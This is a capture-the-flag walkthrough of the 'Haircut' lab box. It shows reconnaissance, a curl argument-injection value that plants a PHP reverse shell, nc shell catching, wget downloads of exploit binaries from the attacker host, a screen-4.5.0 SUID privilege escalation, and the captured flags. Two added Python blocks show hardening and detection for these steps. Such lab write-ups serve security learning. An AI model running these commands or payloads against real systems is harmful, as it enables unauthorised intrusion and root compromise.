First, start with an Nmap scan.
# nmap -sV -sC -T4 -p- 10.10.10.24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 16:37 UTC
Nmap scan report for 10.10.10.24
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.49 seconds
Only a couple of ports to work with. Checking out port 80, I am greeted with a basic webpage with a photo.
Running gobuster, I find a couple of pages.
# gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 20
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.24
[+] Threads:        20
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php
[+] Timeout:        10s
===============================================================
2019/09/26 16:46:56 Starting gobuster
===============================================================
/uploads (Status: 301)
/exposed.php (Status: 200)
The /uploads directory redirects to a 403, so I can't do much there right now. The /exposed.php page is the one I want. In the top left there is a button that prints out a test.html file from the localhost.
I decided to see whether I could make the box interact with my attacking machine. To do this I set up a Python SimpleHTTPServer on my attacking machine so I could attempt to transfer a reverse shell over.
# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

# http://10.10.14.21/shell.php -o uploads/shell.php
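The reason the value above lands a file in /uploads is that exposed.php passes what the user submits straight into a command line, so the trailing `-o uploads/shell.php` is parsed as an output option rather than as part of the URL. The following is an added Python example, not the box's PHP (which the page does not show), contrasting that shell-string pattern with a hardened version that validates the value and passes it as a single argv element after `--`; the `ALLOWED_HOSTS` set is an assumption for the example.

```python
import shlex
from urllib.parse import urlparse

# Constructed inputs: the page's normal use (fetch test.html from localhost)
# and the value entered in the writeup above.
BENIGN = "http://127.0.0.1/test.html"
INJECTED = "http://10.10.14.21/shell.php -o uploads/shell.php"

# Hosts the page is meant to fetch from (assumption for this example).
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}


def unsafe_argv(user_url: str) -> list[str]:
    """Vulnerable pattern: the value is spliced into a shell string.

    The shell splits on whitespace, so every extra token the user supplies
    (here '-o' and a file path) reaches the fetcher as its own argument.
    """
    return shlex.split(f"curl {user_url}")


def safe_argv(user_url: str) -> list[str]:
    """Hardened pattern: validate the value, then build argv without a shell.

    The URL is passed as exactly one argument after '--', so a value with
    spaces or leading dashes can never be read as an option.
    """
    if any(ch.isspace() for ch in user_url):
        raise ValueError("whitespace is not valid in a URL")
    parsed = urlparse(user_url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("only http(s) URLs are allowed")
    if parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError("host not in allowlist")
    # -g turns off curl's {}/[] URL globbing; the output path is never user-controlled.
    return ["curl", "-sS", "-g", "--max-time", "5", "--", user_url]


def rejects(user_url: str) -> bool:
    """True when the hardened builder refuses the value."""
    try:
        safe_argv(user_url)
    except ValueError:
        return True
    return False


def is_injection_attempt(user_url: str) -> bool:
    """Detection helper for request logs: does the value carry extra option tokens?"""
    tokens = shlex.split(user_url)
    return len(tokens) > 1 and any(t.startswith("-") for t in tokens[1:])
```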
Now I set up my nc listener and trigger the shell by navigating to http://10.10.14.21/uploads/shell.php. Checking the listener, I see that a shell has opened.
# nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.24] 43682
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 19:45:58 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
From here I can grab the user flag.
$ cat user.txt
0b0da2af50e9ab7c81a6ec2c562afeae
Now for the priv esc. Running a LinEnum script, I see the vulnerable SUID binary screen-4.5.0.
-rwsr-sr-x 1 daemon daemon   51464 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 root   root     54256 May  4  2017 /usr/bin/passwd
-rwsr-xr-x 1 root   root   1588648 May 19  2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root   root     40432 May  4  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root     49584 May  4  2017 /usr/bin/chfn
A quick Google search reveals the exploit. The problem is that it does not work straight away because gcc is broken on the box, so I need to compile libhax.c and rootshell.c locally and then upload them to the box.
# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
/tmp/libhax.c: In function ‘dropshell’:
# gcc -o /tmp/rootshell /tmp/rootshell.c
/tmp/rootshell.c: In function ‘main’:
Now I need to copy libhax.so and rootshell over to the /tmp directory on the box. I can do this using a Python SimpleHTTPServer again.
$ wget 10.10.14.21:8000/rootshell
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
--2019-09-26 21:02:00--  http://10.10.14.21:8000/rootshell
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16824 (16K) [application/octet-stream]
Saving to: 'rootshell'

     0K .......... ......                                     100%  562K=0.03s

2019-09-26 21:02:01 (562 KB/s) - 'rootshell' saved [16824/16824]

[+] done!
$ wget 10.10.14.21:8000/libhax.so
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
--2019-09-26 21:01:48--  http://10.10.14.21:8000/libhax.so
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16136 (16K) [application/octet-stream]
Saving to: 'libhax.so'

     0K .......... .....                                      100%  521K=0.03s

2019-09-26 21:01:48 (521 KB/s) - 'libhax.so' saved [16136/16136]
Now run the exploit from earlier.
$ bash screenroot.sh
~ gnu/screenroot ~
[+] First, I create our shell and library...
gcc: error trying to exec 'cc1': execvp: No such file or directory
gcc: error trying to exec 'cc1': execvp: No such file or directory
[+] Now I create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

whoami
root
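Two things in the escalation above are cheap for a defender to check: a setuid binary that is not part of the distribution's baseline (screen-4.5.0, a hand-built copy with the version in its file name) and an /etc/ld.so.preload pointing into /tmp, which is what the ld.so errors in the wget and exploit output are complaining about. The following is an added Python audit, not part of the writeup or of the exploit, run here over a constructed copy of the LinEnum listing and of the preload file; the `BASELINE` set is an assumption and should be generated from a clean image of the same release.

```python
import re
from pathlib import Path

# Constructed sample: the setuid listing from the LinEnum output above.
SUID_LISTING = """\
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 49584 May 4 2017 /usr/bin/chfn
"""

# Constructed /etc/ld.so.preload as left behind by the exploit (see the ld.so error above).
PRELOAD_AFTER_EXPLOIT = "/tmp/libhax.so\n"

# Expected setuid binaries (assumption for the example: build this from a clean image).
BASELINE = {"/usr/bin/at", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
            "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount"}
VERSIONED_NAME = re.compile(r"-\d+(\.\d+)+$")   # e.g. screen-4.5.0
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def audit_suid(listing: str) -> dict[str, list[str]]:
    """Map each suspicious setuid path in an ls -l listing to its reasons."""
    findings = {}
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 9 or "s" not in parts[0][:4]:
            continue                      # not an ls -l row, or not setuid
        path, name = parts[-1], Path(parts[-1]).name
        reasons = []
        if path not in BASELINE:
            reasons.append("not in baseline")
        if VERSIONED_NAME.search(name):
            reasons.append("version in file name: likely built by hand, not packaged")
        if reasons:
            findings[path] = reasons
    return findings


def audit_ld_preload(content: str) -> list[tuple[str, bool]]:
    """Return (entry, in_scratch_dir) for every library listed in ld.so.preload.

    The file is normally absent or empty, so any entry deserves a look; an entry
    under /tmp is how this exploit gets its library loaded into root processes.
    """
    hits = []
    for raw in content.splitlines():
        entry = raw.strip()
        if entry and not entry.startswith("#"):
            hits.append((entry, entry.startswith(SCRATCH_DIRS)))
    return hits
```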
Now I can grab the root flag.
# cat root.txt
4cfa26d84b2220826a07f0697dc72151